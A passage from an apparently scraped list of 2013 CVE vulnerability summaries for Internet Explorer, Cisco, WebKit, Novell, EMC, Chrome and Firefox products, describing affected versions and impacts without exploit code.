configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not ensure that the SSL lock icon is consistent with the Address bar, which makes it easier for remote attackers to spoof web sites via a crafted HTML document that triggers many HTTPS requests to an arbitrary host, followed by an HTTPS request to a trusted host and then an HTTP request to an untrusted host, a related issue to CVE-2013-1450. [CVE-2013-1406] The Virtual Machine Communication Interface (VMCI) implementation in vmci.sys in VMware Workstation 8.x before 8.0.5 and 9.x before 9.0.1 on Windows, VMware Fusion 4.1 before 4.1.4 and 5.0 before 5.0.2, VMware View 4.x before 4.6.2 and 5.x before 5.1.2 on Windows, VMware ESXi 4.0 through 5.1, and VMware ESX 4.0 and 4.1 does not properly restrict memory allocation by control code, which allows local users to gain privileges via unspecified vectors. [CVE-2013-1393] Cross-site scripting (XSS) vulnerability in the CurvyCorners module 6.x-1.x and 7.x-1.x for Drupal allows remote authenticated users with the "administer curvycorners" permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1338] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1304. [CVE-2013-1318] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers access to an invalid pointer, aka "Publisher Corrupt Interface Pointer Vulnerability." [CVE-2013-1312] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1311] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1310] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability." [CVE-2013-1309] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-2551. [CVE-2013-1308] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1309 and CVE-2013-2551. [CVE-2013-1307] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-0811. [CVE-2013-1306] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1313. [CVE-2013-1304] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1338. [CVE-2013-1303] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338. [CVE-2013-1297] Microsoft Internet Explorer 6 through 8 does not properly restrict data access by VBScript, which allows remote attackers to perform cross-domain reading of JSON files via a crafted web site, aka "JSON Array Information Disclosure Vulnerability." [CVE-2013-1296] The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote Desktop Connection Client 6.1 and 7.0 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a web page that triggers access to a deleted object, and allows remote RDP servers to execute arbitrary code via unspecified vectors that trigger access to a deleted object, aka "RDP ActiveX Control Remote Code Execution Vulnerability." [CVE-2013-1289] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1, Groove Server 2010 SP1, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2013-1288] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CTreeNode Use After Free Vulnerability." [CVE-2013-1247] Cross-site scripting (XSS) vulnerability in the wireless configuration module in Cisco Prime Infrastructure allows remote attackers to inject arbitrary web script or HTML via an SSID that is not properly handled during display of the XML windowing table, aka Bug ID CSCuf04356. [CVE-2013-1245] The user-management page in Cisco WebEx Social relies on client-side validation of values in the Screen Name, First Name, Middle Name, Last Name, Email Address, and Job Title fields, which allows remote authenticated users to bypass intended access restrictions via crafted requests, aka Bug ID CSCue67190. [CVE-2013-1244] Cross-site scripting (XSS) vulnerability in the portal module in Cisco WebEx Social allows remote authenticated users to inject arbitrary web script or HTML via a javascript: URL in the link field in a post, aka Bug ID CSCue67199. [CVE-2013-1242] Memory leak in the web framework in the server in Cisco Unified Presence (CUP) allows remote attackers to cause a denial of service (memory consumption) via malformed TCP packets, aka Bug ID CSCug38080. [CVE-2013-1240] The command-line interface in Cisco Unified Communications Manager (CUCM) does not properly validate input, which allows local users to read arbitrary files via unspecified vectors, aka Bug ID CSCue25770. [CVE-2013-1232] The HTTP implementation in Cisco WebEx Node for MCS, WebEx Meetings Server, and WebEx Node for ASR 1000 Series allows remote attackers to read the contents of uninitialized memory locations via a crafted request, aka Bug IDs CSCue36672, CSCue31363, CSCuf17466, and CSCug61252. [CVE-2013-1231] The HTTP implementation in Cisco WebEx Node for MCS and WebEx Meetings Server allows remote attackers to read cache files via a crafted request, aka Bug IDs CSCue36664 and CSCue36629. [CVE-2013-1227] Cross-site scripting (XSS) vulnerability in the web framework in Cisco Unified Communications Domain Manager allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCug37902. [CVE-2013-1222] The Tomcat Web Management feature in Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 does not properly configure Tomcat components, which allows remote attackers to launch arbitrary custom web applications via a crafted (1) HTTP or (2) HTTPS request, aka Bug ID CSCub38379. [CVE-2013-1221] The Tomcat Web Management feature in Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 does not properly configure Tomcat components, which allows remote attackers to execute arbitrary code via a crafted (1) HTTP or (2) HTTPS request, aka Bug ID CSCub38384. [CVE-2013-1205] The Event Center module in Cisco WebEx Meetings Server does not perform request authentication in all intended circumstances, which allows remote attackers to discover host keys and event passwords via crafted URLs, aka Bug ID CSCue62485. [CVE-2013-1200] Session fixation vulnerability in Cisco Secure Access Control System (ACS) allows remote attackers to hijack web sessions via unspecified vectors, aka Bug ID CSCud95787. [CVE-2013-1198] Cross-site scripting (XSS) vulnerability in a Flash component in Cisco Unified Computing System (UCS) Central allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCud15430. [CVE-2013-1196] The command-line interface in Cisco Secure Access Control System (ACS), Identity Services Engine Software, Context Directory Agent, Application Networking Manager (ANM), Prime Network Control System, Prime LAN Management Solution (LMS), Prime Collaboration, Unified Provisioning Manager, Network Services Manager, Prime Data Center Network Manager (DCNM), and Quad does not properly validate input, which allows local users to obtain root privileges via unspecified vectors, aka Bug IDs CSCug29384, CSCug13866, CSCug29400, CSCug29406, CSCug29411, CSCug29413, CSCug29416, CSCug29418, CSCug29422, CSCug29425, and CSCug29426, a different issue than CVE-2013-1125. [CVE-2013-1183] Buffer overflow in the Intelligent Platform Management Interface (IPMI) functionality in the Manager component in Cisco Unified Computing System (UCS) 1.0 and 1.1 before 1.1(1j) and 1.2 before 1.2(1b) allows remote attackers to execute arbitrary code via malformed data in a UDP packet, aka Bug ID CSCtd32371. [CVE-2013-1182] The login page in the Web Console in the Manager component in Cisco Unified Computing System (UCS) before 1.0(2h), 1.1 before 1.1(1j), and 1.3(x) allows remote attackers to bypass LDAP authentication via a malformed request, aka Bug ID CSCtc91207. [CVE-2013-1181] Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389. [CVE-2013-1171] Multiple cross-site scripting (XSS) vulnerabilities in the element-list implementation in Cisco Connected Grid Network Management System (CG-NMS) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCue14517, CSCue38914, CSCue38884, CSCue38882, CSCue38881, CSCue38872, CSCue38868, CSCue38866, CSCue38853, and CSCue14540. [CVE-2013-1169] Cisco Unified MeetingPlace Web Conferencing Server 7.x before 7.1MR1 Patch 2, 8.0 before 8.0MR1 Patch 2, and 8.5 before 8.5MR3 Patch 1, when the Remember Me option is used, does not properly verify cookies, which allows remote attackers to impersonate users via a crafted login request, aka Bug ID CSCuc64846. [CVE-2013-1168] The web server in Cisco Unified MeetingPlace Application Server 7.x before 7.1MR1 Patch 2, 8.0 before 8.0MR1 Patch 1, and 8.5 before 8.5MR3 Patch 1 does not invalidate a session upon a logout action, which makes it easier for remote attackers to hijack sessions by leveraging knowledge of a session cookie, aka Bug ID CSCuc64885. [CVE-2013-1167] Cisco IOS XE 3.2 through 3.4 before 3.4.2S, and 3.5, on 1000 series Aggregation Services Routers (ASR), when bridge domain interface (BDI) is enabled, allows remote attackers to cause a denial of service (card reload) via packets that are not properly handled during the processing of encapsulation, aka Bug ID CSCtt11558. [CVE-2013-1160] Cross-site scripting (XSS) vulnerability in the OpenView web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56743. [CVE-2013-1159] Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56706. [CVE-2013-1158] Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring (ITM) help menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud54397. [CVE-2013-1157] Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring (ITM) Java servlet container in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud51068. [CVE-2013-1139] The nsAPI interface in Cisco Cloud Portal 9.1 SP1 and SP2, and 9.3 through 9.3.2, does not properly check privileges, which allows remote authenticated users to obtain sensitive information via a crafted URL, aka Bug ID CSCud81134. [CVE-2013-1132] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Communications Domain Manager allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) IptAccountMgmt, (2) IptFeatureConfigTemplateMgmt, (3) IptFeatureDisplayPolicyMgmt, or (4) IptProviderMgmt page, aka Bug IDs CSCud69972, CSCud70193, and CSCud70261. [CVE-2013-1125] The command-line interface in Cisco Identity Services Engine Software, Secure Access Control System (ACS), Application Networking Manager (ANM), Prime LAN Management Solution (LMS), Prime Network Control System, Quad, Context Directory Agent, Prime Collaboration, Unified Provisioning Manager, and Network Services Manager does not properly validate input, which allows local users to obtain root privileges via unspecified vectors, aka Bug IDs CSCue46001, CSCud95790, CSCue46021, CSCue46025, CSCue46023, CSCue46058, CSCue46013, CSCue46031, CSCue46035, and CSCue46042. [CVE-2013-1123] Multiple cross-site scripting (XSS) vulnerabilities in the server in Cisco Unified MeetingPlace 7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters, aka Bug IDs CSCuc65411 and CSCue18706. [CVE-2013-1114] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity Express before 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCud87527. [CVE-2013-1113] Cross-site scripting (XSS) vulnerability in Cisco Unified Communications Domain Manager allows remote attackers to inject arbitrary web script or HTML via a crafted parameter value, aka Bug ID CSCue21042. [CVE-2013-1110] Cisco WebEx Training Center allow remote authenticated users to bypass intended privilege restrictions and (1) enable or (2) disable training-center recordings via a crafted URL, aka Bug ID CSCzu81065. [CVE-2013-1109] Cross-site request forgery (CSRF) vulnerability in testingLibraryAction.do in the Training Center testing library in Cisco WebEx Training Center allows remote attackers to hijack the authentication of arbitrary users for requests that delete tests, aka Bug ID CSCzu81067. [CVE-2013-1108] Cisco WebEx Training Center allows remote authenticated users to remove hands-on lab-session reservations via a crafted URL, aka Bug ID CSCzu81064. [CVE-2013-1107] The search function in Cisco Webex Social (formerly Cisco Quad) allows remote authenticated users to read files via unspecified parameters, aka Bug ID CSCud40235. [CVE-2013-1097] Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to inject arbitrary web script or HTML via vectors involving an onload event. [CVE-2013-1095] Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to inject arbitrary web script or HTML via vectors involving an onError event. [CVE-2013-1094] Cross-site scripting (XSS) vulnerability in a ZCC page in zenworks-core in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to inject arbitrary web script or HTML via an invalid locale. [CVE-2013-1093] Open redirect vulnerability in the fwdToURL function in the ZCC login page in zcc-framework.jar in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the directToPage parameter. [CVE-2013-1087] Cross-site scripting (XSS) vulnerability in the client in Novell GroupWise through 8.0.3 HP3, and 2012 through SP2, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML via the body of an e-mail message. [CVE-2013-1086] Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupWise before 8.0.3 HP3, and 2012 before SP2, allows remote attackers to inject arbitrary web script or HTML via vectors involving an onError attribute. [CVE-2013-1080] The web server in Novell ZENworks Configuration Management (ZCM) 10.3 and 11.2 does not properly perform authentication for zenworks/jsp/index.jsp, which allows remote attackers to conduct directory traversal attacks, and consequently upload and execute arbitrary programs, via a request to TCP port 443. [CVE-2013-1079] Directory traversal vulnerability in the ISCreateObject method in an ActiveX control in InstallShield\ISProxy.dll in AdminStudio in Novell ZENworks Configuration Management (ZCM) 10.3 through 11.2 allows remote attackers to execute arbitrary local DLL files via a crafted web page that also calls the Initialize method. [CVE-2013-1023] WebKit, as used in Apple Safari before 6.0.5, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2013-1009. [CVE-2013-1013] XSS Auditor in WebKit in Apple Safari before 6.0.5 does not properly rewrite URLs, which allows remote attackers to trigger unintended form submissions via unspecified vectors. [CVE-2013-1012] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 6.0.5 allows remote attackers to inject arbitrary web script or HTML via vectors involving IFRAME elements. [CVE-2013-1011] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1010] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1009] WebKit, as used in Apple Safari before 6.0.5, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2013-1023. [CVE-2013-1008] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1007] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1006] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1005] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1004] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1003] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1002] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1001] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-1000] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0999] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0998] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0997] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0996] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0995] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0994] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0993] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0992] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0991] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1. [CVE-2013-0974] StoreKit in Apple iOS before 6.1 does not properly handle the disabling of JavaScript within the preferences configuration of Mobile Safari, which allows remote attackers to bypass intended access restrictions and execute JavaScript code via a web site with a Smart App Banner. [CVE-2013-0973] Software Update in Apple Mac OS X through 10.7.5 does not prevent plugin loading within the marketing-text WebView, which allows man-in-the-middle attackers to execute plugin code by modifying the client-server data stream. [CVE-2013-0968] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0967] CoreTypes in Apple Mac OS X before 10.8.3 includes JNLP files in the list of safe file types, which allows remote attackers to bypass a Java plug-in disabled setting, and trigger the launch of Java Web Start applications, via a crafted web site. [CVE-2013-0962] Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before 6.1 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted content that is not properly handled during a copy-and-paste operation. [CVE-2013-0961] WebKit in Apple Safari before 6.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2013-0960. [CVE-2013-0960] WebKit in Apple Safari before 6.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2013-0961. [CVE-2013-0959] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0958] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0956] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0955] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0954] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0953] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0952] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0951] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0950] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0949] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0948] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1. [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0939] EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, Documentum Taskspace before 6.7 SP2, and Documentum Records Manager before 6.7 SP2 allow remote attackers to obtain sensitive information via vectors involving cross-origin frame navigation, related to a "Cross Frame Scripting" issue. [CVE-2013-0938] Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, Documentum Taskspace before 6.7 SP2, and Documentum Records Manager before 6.7 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0937] Session fixation vulnerability in EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, Documentum Taskspace before 6.7 SP2, and Documentum Records Manager before 6.7 SP2 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2013-0936] Cross-site scripting (XSS) vulnerability in EMC Smarts IP Manager, Smarts Service Assurance Manager, Smarts Server Manager, Smarts VoIP Availability Manager, Smarts Network Protocol Manager, and Smarts MPLS Manager before 9.2 allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0933] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework 4.x, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-0926] Google Chrome before 26.0.1410.43 does not properly handle active content in an EMBED element during a copy-and-paste operation, which allows user-assisted remote attackers to have an unspecified impact via a crafted web site. [CVE-2013-0922] Google Chrome before 26.0.1410.43 does not properly restrict brute-force access attempts against web sites that require HTTP Basic Authentication, which has unspecified impact and attack vectors. [CVE-2013-0921] The Isolated Sites feature in Google Chrome before 26.0.1410.43 does not properly enforce the use of separate processes, which makes it easier for remote attackers to bypass intended access restrictions via a crafted web site. [CVE-2013-0918] Google Chrome before 26.0.1410.43 does not prevent navigation to developer tools in response to a drag-and-drop operation, which allows user-assisted remote attackers to have an unspecified impact via a crafted web site. [CVE-2013-0916] Use-after-free vulnerability in the Web Audio implementation in Google Chrome before 26.0.1410.43 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2013-0912] WebKit in Google Chrome before 25.0.1364.160 allows remote attackers to execute arbitrary code via vectors that leverage "type confusion." [CVE-2013-0904] The Web Audio implementation in Google Chrome before 25.0.1364.152 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2013-0885] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict API privileges during interaction with the Chrome Web Store, which has unspecified impact and attack vectors. [CVE-2013-0879] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly implement web audio nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2013-0843] content/renderer/media/webrtc_audio_renderer.cc in Google Chrome before 24.0.1312.56 on Mac OS X does not use an appropriate buffer size for the 96 kHz sampling rate, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a web site that provides WebRTC audio. [CVE-2013-0811] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1307. [CVE-2013-0796] The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 on Linux does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (free of unallocated memory) via unspecified vectors. [CVE-2013-0795] The System Only Wrapper (SOW) implementation in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 does not prevent use of the cloneNode method for cloning a protected node, which allows remote attackers to bypass the Same Origin Policy or possibly execute arbitrary JavaScript code with chrome privileges via a crafted web site. [CVE-2013-0794] Mozilla Firefox before 20.0 and SeaMonkey before 2.17 do not prevent origin spoofing of tab-modal dialogs, which allows remote attackers to conduct phishing attacks via a crafted web site. [CVE-2013-0785] Cross-site scripting (XSS) vulnerability in show_bug.cgi in Bugzilla before 3.6.13, 3.7.x and 4.0.x before 4.0.10, 4.1.x and 4.2.x before 4.2.5, and 4.3.x and 4.4.x before 4.4rc2 allows remote attackers to inject arbitrary web script or HTML via the id parameter in conjunction with an invalid value of the format parameter. [CVE-2013-0776] Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbird before 17.0.3, Thunderbird ESR 17.x before 17.0.3, and SeaMonkey before 2.16 allow man-in-the-middle attackers to spoof the address bar by operating a proxy server that provides a 407 HTTP status code accompanied by web 